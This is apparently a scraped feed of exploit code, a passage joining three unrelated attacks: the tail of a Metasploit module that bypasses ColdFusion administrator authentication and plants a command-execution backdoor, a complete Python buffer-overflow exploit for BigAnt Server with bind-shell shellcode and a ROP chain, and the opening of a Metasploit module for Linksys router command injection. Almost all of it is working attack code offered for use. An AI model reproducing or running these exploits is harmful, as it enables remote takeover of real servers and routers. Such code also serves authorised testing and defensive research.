successful, empty otherwise def login cf_cookies = {} ways = { 'RDS bypass' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], true) }, 'RDS login' => Proc.new { |foo| adminapi_login(datastore['USERNAME'], datastore['PASSWORD'], false) }, 'Administrator login' => Proc.new { |foo| administrator_login(datastore['USERNAME'], datastore['PASSWORD']) }, } ways.each do |what, how| these_cookies = how.call if got_auth? these_cookies print_status "Authenticated using '#{what}' technique" cf_cookies = these_cookies break end end fail_with(Exploit::Failure::NoAccess, "Unable to authenticate") if cf_cookies.empty? cf_cookies end def exploit # login cf_cookies = login # if we managed to login, get the listener ready datastore['URIPATH'] = rand_text_alphanumeric(6) srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}" start_service # drop a payload on disk which we can used to execute # arbitrary commands, which will be needed regardless of # which technique (cmd, payload) the user wants input_exec = srv_uri + "/#{datastore['URIPATH']}-e" output_exec = "#{datastore['URIPATH']}-e.cfm" schedule_drop cf_cookies, input_exec, output_exec if datastore['CMD'] and not datastore['CMD'].empty? # now that the coldfusion exec is on disk, execute it, # passing in the command and arguments parts = datastore['CMD'].split(/\s+/) res = execute output_exec, parts.shift, parts.join(' ') print_line res.body.strip else # drop the payload input_payload = srv_uri + "/#{datastore['URIPATH']}-p" output_payload = "#{datastore['URIPATH']}-p" schedule_drop cf_cookies, input_payload, output_payload # make the payload executable # XXX: windows? execute output_exec, 'chmod', "755 ../../wwwroot/CFIDE/#{output_payload}" # execute the payload execute output_exec, "../../wwwroot/CFIDE/#{output_payload}" end handler end def execute cfm, cmd, args='' uri = "/CFIDE/" + cfm + "?cmd=#{cmd}&args=#{Rex::Text::uri_encode args}" send_request_raw( { 'uri' => uri, 'method' => 'GET' }, 25 ) end def on_new_session(client) return # TODO: cleanup if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") @files.each do |file| client.fs.file.rm("#{file}") end else @files.each do |file| client.shell_command_token("rm #{file}") end end end def on_request_uri cli, request cf_payload = "test" case request.uri when "/#{datastore['URIPATH']}-e" cf_payload = <<-EOF <cfparam name="url.cmd" type="string" default="id"/> <cfparam name="url.args" type="string" default=""/> <cfexecute name=#url.cmd# arguments=#url.args# timeout="5" variable="output" /> <cfoutput>#output#</cfoutput> EOF when "/#{datastore['URIPATH']}-p" cf_payload = payload.encoded end send_response(cli, cf_payload, { 'Content-Type' => 'text/html' }) end # Given a hash of cookie key value pairs, return a string # suitable for use as an HTTP Cookie header def build_cookie_header cookies cookies.to_a.map { |a| a.join '=' }.join '; ' end # this doesn't actually work def twiddle_csrf cookies, enable=false mode = (enable ? "Enabling" : "Disabling") print_status "#{mode} CSRF protection" params = { 'SessEnable' => enable.to_s, } res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "/CFIDE/administrator/settings/memoryvariables.cfm"), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies), 'vars_post' => params, }) if res if res.body =~ /SessionManagement should/ print_error "Error #{mode} CSRF" end else print_error "No response while #{mode} CSRF" end end # Using the provided +cookies+, schedule a ColdFusion task # to request content from +input_uri+ and drop it in +output_path+ def schedule_drop cookies, input_uri, output_path vprint_status "Attempting to schedule ColdFusion task" cookie_hash = cookies scheduletasks_path = "/CFIDE/administrator/scheduler/scheduletasks.cfm" scheduleedit_path = "/CFIDE/administrator/scheduler/scheduleedit.cfm" # make a request to the scheduletasks page to pick up the CSRF token res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path), 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) cookie_hash.merge! get_useful_cookies res if res # XXX: I can only seem to get this to work if 'Enable Session Variables' # is disabled (Server Settings -> Memory Variables) token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first unless token print_warning "Empty CSRF token found -- either CSRF is disabled (good) or we couldn't get one (bad)" #twiddle_csrf cookies, false token = '' end else fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for task listing") end # make a request to the scheduletasks page again, this time passing in our CSRF token # in an attempt to get all of the other cookies used in a request cookie_hash.merge! get_useful_cookies res res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?csrftoken=#{token}&submit=Schedule+New+Task", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) fail_with(Exploit::Failure::Unknown, "No response when trying to GET scheduletasks.cfm for new task") unless res # pick a unique task ID task_id = SecureRandom.uuid # drop the backdoor in the CFIDE directory so it can be executed publish_file = '../../wwwroot/CFIDE/' + output_path # pick a start date. This must be in the future, so pick # one sufficiently far ahead to account for time zones, # improper time keeping, solar flares, drift, etc. start_date = "03/15/#{Time.now.strftime('%Y').to_i + 1}" params = { 'csrftoken' => token, 'TaskName' => task_id, 'Group' => 'default', 'Start_Date' => start_date, 'End_Date' => '', 'ScheduleType' => 'Once', 'StartTimeOnce' => '1:37 PM', 'Interval' => 'Daily', 'StartTimeDWM' => '', 'customInterval_hour' => '0', 'customInterval_min' => '0', 'customInterval_sec' => '0', 'CustomStartTime' => '', 'CustomEndTime' => '', 'repeatradio' => 'norepeatforeverradio', 'Repeat' => '', 'crontime' => '', 'Operation' => 'HTTPRequest', 'ScheduledURL' => input_uri, 'Username' => '', 'Password' => '', 'Request_Time_out' => '', 'proxy_server' => '', 'http_proxy_port' => '', 'publish' => '1', 'publish_file' => publish_file, 'publish_overwrite' => 'on', 'eventhandler' => '', 'exclude' => '', 'onmisfire' => '', 'onexception' => '', 'oncomplete' => '', 'priority' => '5', 'retrycount' => '3', 'advancedmode' => 'true', 'adminsubmit' => 'Submit', 'taskNameOriginal' => task_id, 'groupOriginal' => 'default', 'modeOriginal' => 'server', } cookie_hash.merge! (get_useful_cookies res) res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduleedit_path), 'method' => 'POST', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), 'vars_post' => params, }) if res # if there was something wrong with the task, capture those errors # print them and abort errors = res.body.scan(/<li class="errorText">(.*)<\/li>/i).flatten if errors.empty? if res.body =~ /SessionManagement should/ fail_with(Exploit::Failure::NoAccess, "Unable to bypass CSRF") end print_status "Created task #{task_id}" else fail_with(Exploit::Failure::NoAccess, "Unable to create task #{task_id}: #{errors.join(',')}") end else fail_with(Exploit::Failure::Unknown, "No response when creating task #{task_id}") end print_status "Executing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?runtask=#{task_id}&csrftoken=#{token}&group=default&mode=server", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) #twiddle_csrf cookies, true if datastore['DELETE_TASK'] print_status "Removing task #{task_id}" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, scheduletasks_path) + "?action=delete&task=#{task_id}&csrftoken=#{token}", 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookie_hash), }) end vprint_status normalize_uri(target_uri, publish_file) publish_file end # Given the HTTP response +res+, extract any interesting, non-empty # cookies, returning them as a hash def get_useful_cookies res set_cookie = res.headers['Set-Cookie'] # Parse the Set-Cookie header parsed_cookies = CGI::Cookie.parse(set_cookie) # Clean up the cookies we got by: # * Dropping Path and Expires from the parsed cookies -- we don't care # * Dropping empty (reset) cookies %w(Path Expires).each do |ignore| parsed_cookies.delete ignore parsed_cookies.delete ignore.downcase end parsed_cookies.keys.each do |name| parsed_cookies[name].reject! { |value| value == '""' } end parsed_cookies.reject! { |name,values| values.empty? } # the cookies always seem to start with CFAUTHORIZATION_, but # give the module the ability to log what it got in the event # that this stops becoming an OK assumption unless parsed_cookies.empty? vprint_status "Got the following cookies after authenticating: #{parsed_cookies}" end cookie_pattern = /^CF/ useful_cookies = parsed_cookies.select { |name,value| name =~ cookie_pattern } if useful_cookies.empty? vprint_status "No #{cookie_pattern} cookies found" else vprint_status "The following cookies could be used for future authentication: #{useful_cookies}" end useful_cookies end # Authenticates to ColdFusion Administrator via the adminapi using the # specified +user+ and +password+. If +use_rds+ is true, it is assumed that # the provided credentials are for RDS, otherwise they are assumed to be # credentials for ColdFusion Administrator. # # Returns a hash (cookie name => value) of the cookies obtained def adminapi_login user, password, use_rds vprint_status "Attempting ColdFusion Administrator adminapi login" user ||= '' password ||= '' res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE adminapi administrator.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => { 'method' => 'login', 'adminUserId' => user, 'adminPassword' => password, 'rdsPasswordAllowed' => (use_rds ? '1' : '0') } }) if res if res.code == 200 vprint_status "HTTP #{res.code} when authenticating" return get_useful_cookies(res) else print_error "HTTP #{res.code} when authenticating" end else print_error "No response when authenticating" end {} end # Authenticates to ColdFusion Administrator using the specified +user+ and # +password+ # # Returns a hash (cookie name => value) of the cookies obtained def administrator_login user, password cf_cookies = administrator_9x_login user, password unless got_auth? cf_cookies cf_cookies = administrator_10x_login user, password end cf_cookies end def administrator_10x_login user, password # coldfusion 10 appears to do: # cfadminPassword.value = hex_sha1(cfadminPassword.value) vprint_status "Trying ColdFusion 10.x Administrator login" res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'cfadminUserId' => user, 'cfadminPassword' => Digest::SHA1.hexdigest(password).upcase, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'submit' => 'Login', } }) if res if res.code.to_s =~ /^30[12]/ useful_cookies = get_useful_cookies res if got_auth? useful_cookies return useful_cookies end else if res.body =~ /<title>Error/i print_status "Appears to be restricted and/or not ColdFusion 10.x" elsif res.body =~ /A License exception has occurred/i print_status "Is license restricted" else vprint_status "Got unexpected HTTP #{res.code} response when sending a ColdFusion 10.x request. Not 10.x?" vprint_status res.body end end end return {} end def got_auth? cookies not cookies.select { |name,values| name =~ /^CFAUTHORIZATION_/ }.empty? end def administrator_9x_login user, password vprint_status "Trying ColdFusion 9.x Administrator login" # coldfusion 9 appears to do: # cfadminPassword.value = hex_hmac_sha1(salt.value, hex_sha1(cfadminPassword.value)); # # You can get a current salt from # http://<host>:8500/CFIDE/adminapi/administrator.cfc?method=getSalt&name=CFIDE.adminapi.administrator&path=/CFIDE/adminapi/administrator.cfc#method_getSalt # # Unfortunately that URL might be restricted and the salt really just looks # to be the current time represented as the number of milliseconds since # the epoch, so just use that salt = (Time.now.to_i * 1000).to_s pass = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha1'), salt, Digest::SHA1.hexdigest(password).upcase).upcase res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE administrator enter.cfm)), 'method' => 'POST', 'vars_post' => { 'submit' => 'Login', 'salt' => salt, 'cfadminUserId' => user, 'requestedURL' => '/CFIDE/administrator/index.cfm', 'cfadminPassword' => pass, } }) if res return get_useful_cookies res else print_error "No response while trying ColdFusion 9.x authentication" end {} end # Authenticates to ColdFusion ComponentUtils using the specified +user+ and +password+ # # Returns a hash (cookie name => value) of the cookies obtained def componentutils_login user, password vprint_status "Attempting ColdFusion ComponentUtils login" vars = { 'j_password_required' => "Password+Required", 'submit' => 'Login', } vars['rdsUserId'] = user if user vars['j_password'] = password if password res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, %w(CFIDE componentutils cfcexplorer.cfc)), 'method' => 'POST', 'connection' => 'TE, close', 'vars_post' => vars }) cf_cookies = {} if res.code.to_s =~ /^(?:200|30[12])$/ cf_cookies = get_useful_cookies res else print_error "HTTP #{res.code} while attempting ColdFusion ComponentUtils login" end cf_cookies end def check_cve_2013_0629 vulns = 0 paths = %w(../../../license.txt ../../../../license.html) # first try password-less bypass in the event that this thing # was just wide open vuln_without_creds = false paths.each do |path| if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_creds = true break end end if vuln_without_creds print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 without credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 without credentials" end # if credentials are provided, try those too if datastore['USERNAME'] and datastore['PASSWORD'] vuln_without_bypass = false paths.each do |path| cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD'] if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_without_bypass = true break end end if vuln_without_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 with credentials" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 with credentials" end end # now try with the CVE-2013-0632 bypass, in the event that this wasn't *totally* wide open vuln_with_bypass = false paths.each do |path| cf_cookies = adminapi_login datastore['USERNAME'], datastore['PASSWORD'], true # we need to take the cookie value from CFAUTHORIZATION_cfadmin # and use it for CFAUTHORIZATION_componentutils cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin'] cf_cookies.delete 'CFAUTHORIZATION_cfadmin' if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/ vulns += 1 vuln_with_bypass = true break end end if vuln_with_bypass print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" else print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0629 in combination with CVE-2013-0632" end vulns > 0 end # Checks for CVE-2013-0632, returning true if the target is # vulnerable, false otherwise def check_cve_2013_0632 if datastore['USERDS'] # the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but # subsequently *enabled* after install, the password is unset so we simply must # check that and only that. cf_cookies = adminapi_login 'foo', 'bar', true if cf_cookies.empty? print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632" else print_status "#{datastore['RHOST']} is vulnerable to CVE-2013-0632" return true end else print_error "Cannot test #{datastore['RHOST']} CVE-2013-0632 with USERDS off" end false end def traverse_read path, cookies uri = normalize_uri(target_uri.path) uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path=" uri << path res = send_request_cgi( { 'uri' => uri, 'method' => 'GET', 'connection' => 'TE, close', 'cookie' => build_cookie_header(cookies) }) res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '') end

==> BigAnt Server 2.97 - DDNF Username Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/python #Title: BigAnt Server 2.97 DDNF Username Buffer Overflow #Author: Craig Freyman (@cd1zz) http://pwnag3.com #Tested on: Windows 7 64 bit (DEP/ASLR Bypass) #Similar Exploits: #http://www.exploit-db.com/exploits/24528/ #http://www.exploit-db.com/exploits/24527/ #http://www.exploit-db.com/exploits/22466/ import socket,os,struct,sys,subprocess,time if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] + "\r" sys.exit(0) host = sys.argv[1] #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "\x00\x0a\x0d\x20\x25\x27" sc = ( "\xd9\xec\xba\x1f\xaf\x04\x2d\xd9\x74\x24\xf4\x5d\x2b\xc9" "\xb1\x56\x31\x55\x18\x03\x55\x18\x83\xc5\x1b\x4d\xf1\xd1" "\xcb\x18\xfa\x29\x0b\x7b\x72\xcc\x3a\xa9\xe0\x84\x6e\x7d" "\x62\xc8\x82\xf6\x26\xf9\x11\x7a\xef\x0e\x92\x31\xc9\x21" "\x23\xf4\xd5\xee\xe7\x96\xa9\xec\x3b\x79\x93\x3e\x4e\x78" "\xd4\x23\xa0\x28\x8d\x28\x12\xdd\xba\x6d\xae\xdc\x6c\xfa" "\x8e\xa6\x09\x3d\x7a\x1d\x13\x6e\xd2\x2a\x5b\x96\x59\x74" "\x7c\xa7\x8e\x66\x40\xee\xbb\x5d\x32\xf1\x6d\xac\xbb\xc3" "\x51\x63\x82\xeb\x5c\x7d\xc2\xcc\xbe\x08\x38\x2f\x43\x0b" "\xfb\x4d\x9f\x9e\x1e\xf5\x54\x38\xfb\x07\xb9\xdf\x88\x04" "\x76\xab\xd7\x08\x89\x78\x6c\x34\x02\x7f\xa3\xbc\x50\xa4" "\x67\xe4\x03\xc5\x3e\x40\xe2\xfa\x21\x2c\x5b\x5f\x29\xdf" "\x88\xd9\x70\x88\x7d\xd4\x8a\x48\xe9\x6f\xf8\x7a\xb6\xdb" "\x96\x36\x3f\xc2\x61\x38\x6a\xb2\xfe\xc7\x94\xc3\xd7\x03" "\xc0\x93\x4f\xa5\x68\x78\x90\x4a\xbd\x2f\xc0\xe4\x6d\x90" "\xb0\x44\xdd\x78\xdb\x4a\x02\x98\xe4\x80\x35\x9e\x2a\xf0" "\x16\x49\x4f\x06\x89\xd5\xc6\xe0\xc3\xf5\x8e\xbb\x7b\x34" "\xf5\x73\x1c\x47\xdf\x2f\xb5\xdf\x57\x26\x01\xdf\x67\x6c" "\x22\x4c\xcf\xe7\xb0\x9e\xd4\x16\xc7\x8a\x7c\x50\xf0\x5d" "\xf6\x0c\xb3\xfc\x07\x05\x23\x9c\x9a\xc2\xb3\xeb\x86\x5c" "\xe4\xbc\x79\x95\x60\x51\x23\x0f\x96\xa8\xb5\x68\x12\x77" "\x06\x76\x9b\xfa\x32\x5c\x8b\xc2\xbb\xd8\xff\x9a\xed\xb6" "\xa9\x5c\x44\x79\x03\x37\x3b\xd3\xc3\xce\x77\xe4\x95\xce" "\x5d\x92\x79\x7e\x08\xe3\x86\x4f\xdc\xe3\xff\xad\x7c\x0b" "\x2a\x76\x8c\x46\x76\xdf\x05\x0f\xe3\x5d\x48\xb0\xde\xa2" "\x75\x33\xea\x5a\x82\x2b\x9f\x5f\xce\xeb\x4c\x12\x5f\x9e" "\x72\x81\x60\x8b") #rop chain generated with mona.py - www.corelan.be rop_gadgets = "" rop_gadgets += struct.pack('<L',0x0f9edaa9) # POP EDX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0fa021cc) # ptr to &VirtualProtect() IAT rop_gadgets += struct.pack('<L',0x0f9ea2a7) # MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e0214) # PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0f9ee3d9) # POP ECX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0F9A5001) # &Writable location rop_gadgets += struct.pack('<L',0x0f9f1e7c) # POP EDX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0xffffffff) # EDX starting value for i in range(0,65): rop_gadgets += struct.pack('<L',0x0f9dbb5a) # INC EDX # RETN ghetto style [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e65b6) # POP EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0xfffffdff) # Value to negate, will become 0x00000201 rop_gadgets += struct.pack('<L',0x0f9f2831) # NEG EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi rop_gadgets += struct.pack('<L',0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08 ** [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e24f9) # push esp # ret 0x08 | {PAGE_EXECUTE_READ} [expsrv.dll rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate) rop_gadgets += struct.pack('<L',0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9c8a3e) # POP EAX # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x909006eb) # nop with a ninja jump rop_gadgets += struct.pack('<L',0x0f9f30c2) # PUSHAD # RETN [expsrv.dll] rop_gadgets += struct.pack('<L',0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll] front = "A" * 684 seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll] back = "C" * 1592 stack_adjust = "\x81\xc4\x24\xfa\xff\xff" junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk print "[+] Sending pwnag3 to " + str(host) try : s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,6661)) s.send("" "DDNF 17\n" "classid: 100\n" "cmdid: 1\n" "objid: 1\n" "rootid: 3\n" "userid: 8\n" "username: "+sploit+ "\r\n\r\n") time.sleep(1) except: print "[-] There was a problem" sys.exit() print "[+] Getting your shell. " time.sleep(3) subprocess.Popen("telnet "+host+" 4444",shell=True).wait() print"[*] Done." s.close()

==> Linksys WRT54GL apply.cgi Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WRT54GL apply.cgi Command Execution', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection in the Web Interface. Default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. The user must be prudent when using this module since it modifies the router configuration while exploitation, even when it tries to restore previous values. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '89912' ], [ 'BID', '57459' ], [ 'EDB', '24202' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-001' ] ], 'DisclosureDate' => 'Jan 18 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ]) ], self.class) end def get_config(config, pattern) if config =~ /#{pattern}/ return $1 end return "" end def grab_config(user,pass) print_status("#{rhost}:#{rport} - Trying to download the original configuration") begin res = send_request_cgi({ 'uri' => '/index.asp', 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) if res.body =~ /lan_ipaddr_0/ print_good("#{rhost}:#{rport} - Successful downloaded the configuration") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible") end else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end #now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested! @now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>") if @now_proto_orig !~ /dhcp/ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device") end @wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;") if @wan_proto_orig !~ /dhcp/ fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device") end @lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP") @daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>") @lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>") @wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>") @need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>") @lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\\(this\,1\,223\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>") @lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">") @lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">") @lan_ipaddr_3_orig = get_config(res.body, "<INPUT class=num maxLength=3\ onBlur=\"valid_range\\(this,1,254,'IP'\\)\;Sel_SubMask\\(this.form.lan_netmask,this.form\\);\"\ size=3" << "\ value='(.*)'\ name=\"lan_ipaddr_3\"><\/TD>") @router_name_orig = get_config(res.body, "name=\"router_name\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Router%20Name\"\\)><\/FONT><\/TD>") @wan_domain_orig = get_config(res.body, "name=\"wan_domain\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Domain%20name\"\,SPACE_NO\\)><\/FONT><\/TD>") @wan_hostname_orig = get_config(res.body, "<INPUT\ maxLength=39\ name=\"wan_hostname\"\ size=\"20\"\ value=\'(.*)\'\ onBlur=valid_name\\(this\,\"Host%20Name\"\\)><\/FONT><\/TD>") @wan_mtu_orig = get_config(res.body, "<INPUT\ class=num\ maxLength=4\ onBlur=valid_mtu\\(this\\)\ size=5\ value='(.*)'\ name=\"wan_mtu\"><\/TD>") if @wan_mtu_orig.to_i > 1500 @mtu_enable = "0" end @ui_language_orig = get_config(res.body, "<SCRIPT\ language=\"Javascript\"\ type=\"text\/javascript\" src=\"(.*)_lang_pack\/capsec.js\"><\/SCRIPT>") @dhcp_lease_orig = get_config(res.body, "<INPUT\ maxLength=4\ onBlur=valid_range\\(this\,0\,9999\,\"DHCP%20Lease%20Time\"\\)\ size=4\ value=\'(.*)\'\ name=\"dhcp_lease\"\ class=num") @dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,1\,253\,\"Number%20of%20DHCP%20users\"\\)\;Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)" << "\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>") @dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ " << "onChange=\"valid_dhcpd_start_ip\\(this.form\,\ this\\)\">") @netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>") @wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3") @wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>") @wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>") @wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>") @wan_dns0_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_3\"\ class=num\>") @wan_dns1_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns1_0\"\ class=num\>") @wan_dns1_1_orig = get_config(res.body, 